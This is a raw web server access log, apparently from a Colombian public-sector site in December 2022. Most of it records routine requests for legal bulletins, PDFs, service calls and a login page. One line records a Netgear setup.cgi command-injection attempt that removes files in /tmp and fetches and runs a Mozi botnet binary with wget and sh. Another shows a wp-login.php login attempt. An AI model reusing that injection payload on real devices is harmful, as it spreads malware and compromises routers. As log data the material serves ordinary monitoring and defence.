172.22.2.4 - - [18/Dec/2022:16:18:09 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3047&usuario=&sector=&fecha=2017&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:16:18:10 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0193&usuario=&sector=&fecha=2020&resuelve= HTTP/1.1" 200 1394
172.22.2.4 - - [18/Dec/2022:16:18:18 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0193&usuario=&sector=&fecha=2021&resuelve= HTTP/1.1" 200 626
172.22.2.4 - - [18/Dec/2022:16:18:22 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=0193&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1230
172.22.2.4 - - [18/Dec/2022:16:17:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
186.30.110.146 - - [18/Dec/2022:16:18:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/0193.pdf HTTP/1.1" 200 395805
186.30.110.146 - - [18/Dec/2022:16:18:26 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [18/Dec/2022:16:17:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56079
201.245.192.253 - - [18/Dec/2022:16:20:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43761
201.245.192.253 - - [18/Dec/2022:16:20:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44102
201.245.192.253 - - [18/Dec/2022:16:21:17 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [18/Dec/2022:16:21:34 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.245.221.92 - - [18/Dec/2022:16:21:39 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:16:22:26 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3143&usuario=&sector=&fecha=2016&resuelve= HTTP/1.1" 200 1064
172.22.2.4 - - [18/Dec/2022:16:21:36 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 53195
172.22.2.4 - - [18/Dec/2022:16:22:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:16:23:09 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57824
201.245.192.253 - - [18/Dec/2022:16:26:16 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:16:26:39 -0500] "HEAD / HTTP/1.1" 200 -
173.252.127.15 - - [18/Dec/2022:16:28:38 -0500] "GET /todo-un-exito-la-primera-jornada-de-adopcion-en-la-santamaria-15-perros-y-gatos-encontraron-un-nuevo-hogar-en-bogota.html?fbclid=IwAR0UTmyQZRjI0KQsYfd0TuJIgCeBGx3Bedm_IcV_FMcY888p-8fr-vceNDQ HTTP/1.1" 200 994
185.119.81.104 - - [18/Dec/2022:16:29:24 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [18/Dec/2022:16:29:25 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
58.45.10.92 - - [18/Dec/2022:16:29:40 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
172.22.2.4 - - [18/Dec/2022:16:28:08 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [18/Dec/2022:16:28:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59779
201.245.192.253 - - [18/Dec/2022:16:30:45 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43761
201.245.192.253 - - [18/Dec/2022:16:30:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44102
172.22.2.4 - - [18/Dec/2022:16:31:03 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%201%20del%2017%20de%20Enero%20de%202012.pdf HTTP/1.1" 304 -
201.245.192.253 - - [18/Dec/2022:16:31:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [18/Dec/2022:16:31:39 -0500] "HEAD / HTTP/1.1" 200 -
186.82.10.226 - - [18/Dec/2022:16:31:43 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.82.10.226 - - [18/Dec/2022:16:31:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.82.10.226 - - [18/Dec/2022:16:31:44 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12183
186.82.10.226 - - [18/Dec/2022:16:31:44 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.82.10.226 - - [18/Dec/2022:16:31:44 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.82.10.226 - - [18/Dec/2022:16:31:44 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.82.10.226 - - [18/Dec/2022:16:31:44 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.82.10.226 - - [18/Dec/2022:16:31:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.82.10.226 - - [18/Dec/2022:16:31:44 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.82.10.226 - - [18/Dec/2022:16:31:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
